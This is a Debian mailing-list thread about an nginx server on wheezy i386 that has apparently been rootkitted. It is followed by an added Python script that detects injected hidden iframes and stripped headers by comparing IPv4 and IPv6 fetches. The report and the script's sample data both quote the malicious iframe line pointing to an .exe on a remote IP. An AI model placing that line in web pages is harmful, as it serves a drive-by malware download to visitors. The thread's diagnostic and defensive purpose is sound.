
Re: debian wheezy i386 nginx iframe rootkit



On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote:
 > On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <frankb@efball.com> wrote:
 > > Last fall there was a debian 64-bit / nginx rootkit going around,
 > > now I've been hit with what sounds similar but on 32-bit wheezy.
 > >
 > > All files served by nginx have this line inserted at the top:
 > >
 > > <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
 > >
 > > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
 > > Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
 > > difference.
 > >
 > > No insmod line in /etc/rc.local
 > >
 > > I haven't been able to find anything.  Googling doesn't show anything
 > > similar for debian wheezy i386, only squeeze 64-bit.
 > >
 > > I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
 > > the nginx-light from debian wheezy but it made no difference.


 > 
 > Just out of curiosity, did you back up nginx and check it as well?
 > 
 > --
 > Joel Rees


No, I just uninstalled nginx from dotdeb and installed from Debian.

The webpages are all static and remain unchanged, the nginx config files
are OK.  The new line is added by some process I can't find.

The lynx web browser shows this as the first line of the webpages:

IFRAME: http://122.226.137.123:1111/yixi.exe

It also appears in downloads using wget.
"view source" in firefox or chrome show nothing amiss.

It only appears on IPv4, not IPv6.

I do not have php installed.

The http header is completely different:

curl -I shows this:
 HTTP/1.1 200 OK
 Content-Type: text/html; charset=en_US.UTF-8
 Content-Length: 3634

When it should look more like this:
 HTTP/1.1 200 OK
 Server: nginx/1.4.2
 Date: Wed, 11 Sep 2013 23:39:48 GMT
 Content-Type: text/html; charset=en_US.UTF-8
 Content-Length: 3291
 Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT
 Connection: keep-alive
 Vary: Accept-Encoding
 ETag: "5101a7f4-cdb"
 Accept-Ranges: bytes

I installed chkrootkit, rkhunter, unhide.rb and they found nothing.


   E Frank Ball          frankb@efball.com
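The symptoms above (a hidden iframe prepended to every page, the normal nginx headers stripped, the change visible over IPv4 but not IPv6, and only when the raw bytes are read by lynx, wget or curl) can be checked from another host without trusting anything on the compromised box. The script below is an added example, not part of Frank's mail or of any Debian package: it fetches a URL with a raw socket over IPv4 and over IPv6, flags zero-size or .exe iframes, lists the headers a stock nginx 1.4 static response would carry that are missing, verifies Content-Length against the real body, and diffs the two captures. The two sample responses at the bottom are constructed from the header dumps in the mail, not real captures, so the file also runs offline.

```python
"""Check for injected-iframe/stripped-header tampering, comparing IPv4 vs IPv6.
Added example; CLEAN_V6 and TAMPERED_V4 are constructed, not real traffic."""
import re
import socket

# Headers a stock nginx 1.4 static-file response carries (from the "should look
# more like this" dump above).  Their absence is a tamper signal.
EXPECTED_HEADERS = ("Server", "Date", "Last-Modified", "ETag", "Connection")

# Tolerates the malformed 'src= http://...' (space after '=') seen in the mail.
IFRAME_RE = re.compile(
    rb'<iframe\b[^>]*\bsrc\s*=\s*["\']?\s*([^\s"\'>]+)[^>]*>', re.IGNORECASE)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, {header: value}, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers in response")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def hidden_iframes(body: bytes):
    """src of every iframe that is invisible (width and height 0) or fetches an .exe."""
    found = []
    for m in IFRAME_RE.finditer(body):
        tag, src = m.group(0), m.group(1).decode("latin-1")
        zero_w = re.search(rb'\bwidth\s*=\s*["\']?0\b', tag, re.IGNORECASE)
        zero_h = re.search(rb'\bheight\s*=\s*["\']?0\b', tag, re.IGNORECASE)
        if (zero_w and zero_h) or src.lower().endswith(".exe"):
            found.append(src)
    return found


def missing_headers(headers):
    return [h for h in EXPECTED_HEADERS if h.lower() not in headers]


def content_length_delta(headers, body):
    """Declared Content-Length minus real body length; 0 when consistent."""
    declared = headers.get("content-length", "")
    return int(declared) - len(body) if declared.isdigit() else None


def analyse(raw: bytes):
    status, headers, body = parse_response(raw)
    return {"status": status, "iframes": hidden_iframes(body),
            "missing_headers": missing_headers(headers),
            "length_delta": content_length_delta(headers, body)}


def compare(raw_a: bytes, raw_b: bytes):
    """Diff two captures of the same URL, e.g. fetched over IPv4 and over IPv6."""
    _, ha, ba = parse_response(raw_a)
    _, hb, bb = parse_response(raw_b)
    lines_b = set(bb.splitlines())
    return {"headers_only_in_a": sorted(set(ha) - set(hb)),
            "headers_only_in_b": sorted(set(hb) - set(ha)),
            "bodies_differ": ba != bb,
            "lines_only_in_a": [l for l in ba.splitlines() if l not in lines_b]}


def fetch(host, path="/", family=socket.AF_INET, port=80, timeout=10):
    """Raw HTTP/1.0 GET over one address family; no HTTP library in the way."""
    addr = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM)[0][4]
    req = b"GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n" % (
        path.encode(), host.encode())
    chunks = []
    with socket.socket(family, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect(addr)
        s.sendall(req)
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# --- constructed captures modelled on the mail's header dumps (not real) ----
PAGE = b"<html><body>static page</body></html>\n"
INJECTED = b"<iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>\n"


def _response(header_lines, body):
    return b"\r\n".join(header_lines + [b"Content-Length: %d" % len(body), b"", b""]) + body


CLEAN_V6 = _response([
    b"HTTP/1.1 200 OK", b"Server: nginx/1.4.2",
    b"Date: Wed, 11 Sep 2013 23:39:48 GMT",
    b"Content-Type: text/html; charset=en_US.UTF-8",
    b"Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT",
    b"Connection: keep-alive", b"Vary: Accept-Encoding",
    b'ETag: "5101a7f4-cdb"', b"Accept-Ranges: bytes"], PAGE)

TAMPERED_V4 = _response([
    b"HTTP/1.1 200 OK",
    b"Content-Type: text/html; charset=en_US.UTF-8"], INJECTED + PAGE)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # python3 check.py www.example.com  (live v4 vs v6)
        v4 = fetch(sys.argv[1], family=socket.AF_INET)
        v6 = fetch(sys.argv[1], family=socket.AF_INET6)
    else:                   # offline demo on the constructed captures
        v4, v6 = TAMPERED_V4, CLEAN_V6
    print("IPv4:", analyse(v4))
    print("IPv6:", analyse(v6))
    print("diff:", compare(v4, v6))
```

Run it from a clean machine against the suspect host's name, not from the host itself: if something in the kernel or network path is rewriting nginx's output, a fetch from the box via localhost may or may not be rewritten, while the raw-socket fetch from outside sees exactly what the victims' browsers receive. A non-empty "iframes" list together with all five expected headers missing on the IPv4 capture only, and an identical clean IPv6 capture, reproduces the pattern in the mail and points at something sitting between nginx and the IPv4 socket rather than at the web root or the nginx config.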


